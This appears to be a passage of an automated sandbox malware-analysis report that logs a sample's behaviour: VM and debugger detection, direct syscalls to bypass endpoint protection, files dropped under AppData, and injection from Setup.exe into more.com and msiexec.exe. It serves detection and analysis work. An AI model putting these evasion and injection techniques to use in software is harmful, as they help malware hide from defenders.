              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Yara detected AntiVM3
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 5544, type: MEMORYSTR
              Query firmware table information (likely to detect VMs)
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeSystem information queried: FirmwareTableInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeSystem information queried: FirmwareTableInformationJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSystem information queried: FirmwareTableInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeSystem information queried: FirmwareTableInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeSystem information queried: FirmwareTableInformationJump to behavior
              Switches to a custom stack to bypass stack traces
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeAPI/Special instruction interceptor: Address: 6C3CEE48
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeAPI/Special instruction interceptor: Address: 6B7275DE
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeAPI/Special instruction interceptor: Address: 6C3CEF32
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeAPI/Special instruction interceptor: Address: 6C0503B3
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeAPI/Special instruction interceptor: Address: 6B6B386B
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeAPI/Special instruction interceptor: Address: 6C373217
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeAPI/Special instruction interceptor: Address: 6B6BC18C
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeAPI/Special instruction interceptor: Address: 6C1693AA
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeAPI/Special instruction interceptor: Address: 6C18D830
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeAPI/Special instruction interceptor: Address: 6C36C56F
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeAPI/Special instruction interceptor: Address: 6AB47C44
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeAPI/Special instruction interceptor: Address: 6AB47945
              Source: C:\Windows\SysWOW64\more.comAPI/Special instruction interceptor: Address: 6AB43B54
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeAPI/Special instruction interceptor: Address: 6C3CDC0A
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeAPI/Special instruction interceptor: Address: 6C01A0FC
              Source: C:\Windows\SysWOW64\msiexec.exeAPI/Special instruction interceptor: Address: 4CBC87
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeAPI/Special instruction interceptor: Address: 6BF04BA0
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeAPI/Special instruction interceptor: Address: 6C164B36
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeAPI/Special instruction interceptor: Address: 6C32F4AB
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeAPI/Special instruction interceptor: Address: 6C00D365
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeAPI/Special instruction interceptor: Address: 6C3E4FEA
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeAPI/Special instruction interceptor: Address: 6BF0522F
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeAPI/Special instruction interceptor: Address: 6C054EC0
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeAPI/Special instruction interceptor: Address: 6A6C7C44
              Tries to evade analysis by execution special instruction (VM detection)
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeSpecial instruction interceptor: First address: 6C05B98B instructions rdtsc caused by: RDTSC with Trap Flag (TF)
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5441Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4260Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2746Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\FeGIPCnK\msvcr90.dllJump to dropped file
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Driver\python27.dllJump to dropped file
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\FeGIPCnK\Resource.ctJump to dropped file
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\FeGIPCnK\UpdateClient.dllJump to dropped file
              Source: C:\Windows\SysWOW64\more.comDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\eqoamnqfgJump to dropped file
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\FeGIPCnK\config.prxJump to dropped file
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\FeGIPCnK\python27.dllJump to dropped file
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\FeGIPCnK\UpdateCommon.dllJump to dropped file
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\FeGIPCnK\Data\d3dcompiler_47.dllJump to dropped file
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\FeGIPCnK\NAudio.dllJump to dropped file
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\FeGIPCnK\Data\Updater.exJump to dropped file
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\FeGIPCnK\RcClientBase.dllJump to dropped file
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\FeGIPCnK\Data\ffmpeg.dllJump to dropped file
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Driver\msvcr90.dllJump to dropped file
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeAPI coverage: 7.1 %
              Source: C:\Users\user\AppData\Roaming\Driver\MNCVUBXYFIKB\Setup.exeAPI coverage: 5.7 %
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5744Thread sleep time: -7378697629483816s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 4916Thread sleep time: -240000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1608Thread sleep count: 2746 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6496Thread sleep count: 275 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2180Thread sleep time: -1844674407370954s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: C:\Users\user\AppData\Roaming\Driver\MNCVUBXYFIKB\Setup.exeCode function: 6_2_00007FF764A31F90 FindFirstFileExW,6_2_00007FF764A31F90
              Source: C:\Users\user\AppData\Roaming\Driver\MNCVUBXYFIKB\Setup.exeCode function: 6_2_00007FF764A17A9C FindFirstFileA,FindNextFileA,FindClose,6_2_00007FF764A17A9C
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: Setup.exe, 0000000C.00000002.2210831777.0000000002DCB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: noreply@vmware.com0
              Source: Setup.exe, 0000000C.00000002.2210831777.0000000002DCB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: http://www.vmware.com/0
              Source: msiexec.exe, 0000000B.00000003.2578964271.00000000033AE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2506746140.00000000033AE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580282480.00000000033AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWyU
              Source: Setup.exe, 0000000C.00000002.2210831777.0000000002DCB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.1!0
              Source: msiexec.exe, 0000000B.00000002.2580158081.0000000003378000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWHh;
              Source: Setup.exe, 0000000C.00000002.2210831777.0000000002DCB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: http://www.vmware.com/0/
              Source: msiexec.exe, 0000000B.00000003.2578964271.00000000033AE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2506746140.00000000033AE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580282480.00000000033AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: Setup.exe, 0000000C.00000002.2210831777.0000000002DCB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.1
              Source: Setup.exe, 0000000C.00000002.2210831777.0000000002DCB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.0
              Source: Setup.exe, 0000000C.00000002.2210763818.0000000002C76000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .vmware"m
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeCode function: 3_2_004030A8 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,3_2_004030A8
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeCode function: 3_2_00401CB0 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,OutputDebugStringA,__iob_func,fprintf,3_2_00401CB0
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeCode function: 3_2_004022C0 free,free,VirtualFree,free,GetProcessHeap,HeapFree,3_2_004022C0
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeCode function: 3_2_004030A8 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,3_2_004030A8
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeCode function: 3_2_00402CAD SetUnhandledExceptionFilter,3_2_00402CAD
              Source: C:\Users\user\AppData\Roaming\Driver\MNCVUBXYFIKB\Setup.exeCode function: 6_2_00007FF764A1AFE4 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00007FF764A1AFE4
              Source: C:\Users\user\AppData\Roaming\Driver\MNCVUBXYFIKB\Setup.exeCode function: 6_2_00007FF764A1B1C8 SetUnhandledExceptionFilter,6_2_00007FF764A1B1C8
              Source: C:\Users\user\AppData\Roaming\Driver\MNCVUBXYFIKB\Setup.exeCode function: 6_2_00007FF764A1A92C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_00007FF764A1A92C
              Source: C:\Users\user\AppData\Roaming\Driver\MNCVUBXYFIKB\Setup.exeCode function: 6_2_00007FF764A2B26C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00007FF764A2B26C

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Found direct / indirect Syscall (likely to bypass EDR)
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeNtSetInformationThread: Direct from: 0x6ACC2FA8Jump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeNtQuerySystemInformation: Direct from: 0x6AB12CCCJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeNtProtectVirtualMemory: Direct from: 0x6C0145DBJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2EJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeNtProtectVirtualMemory: Direct from: 0x6AB12CC9Jump to behavior
              Maps a DLL or memory area into another process
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeSection loaded: NULL target: C:\Windows\SysWOW64\more.com protection: read writeJump to behavior
              Source: C:\Windows\SysWOW64\more.comSection loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: read writeJump to behavior
              Writes to foreign memory regions
              Source: C:\Windows\SysWOW64\more.comMemory written: C:\Windows\SysWOW64\msiexec.exe base: 4C9330Jump to behavior
              Source: C:\Windows\SysWOW64\more.comMemory written: C:\Windows\SysWOW64\msiexec.exe base: 2FB5008Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe "C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe" Jump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeProcess created: C:\Users\user\AppData\Roaming\Driver\MNCVUBXYFIKB\Setup.exe C:\Users\user\AppData\Roaming\Driver\MNCVUBXYFIKB\Setup.exeJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeProcess created: C:\Windows\SysWOW64\more.com C:\Windows\SysWOW64\more.comJump to behavior
              Source: C:\Windows\SysWOW64\more.comProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exeJump to behavior
              Source: C:\Users\user\AppData\Roaming\Driver\MNCVUBXYFIKB\Setup.exeCode function: 6_2_00007FF764A38320 cpuid 6_2_00007FF764A38320
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
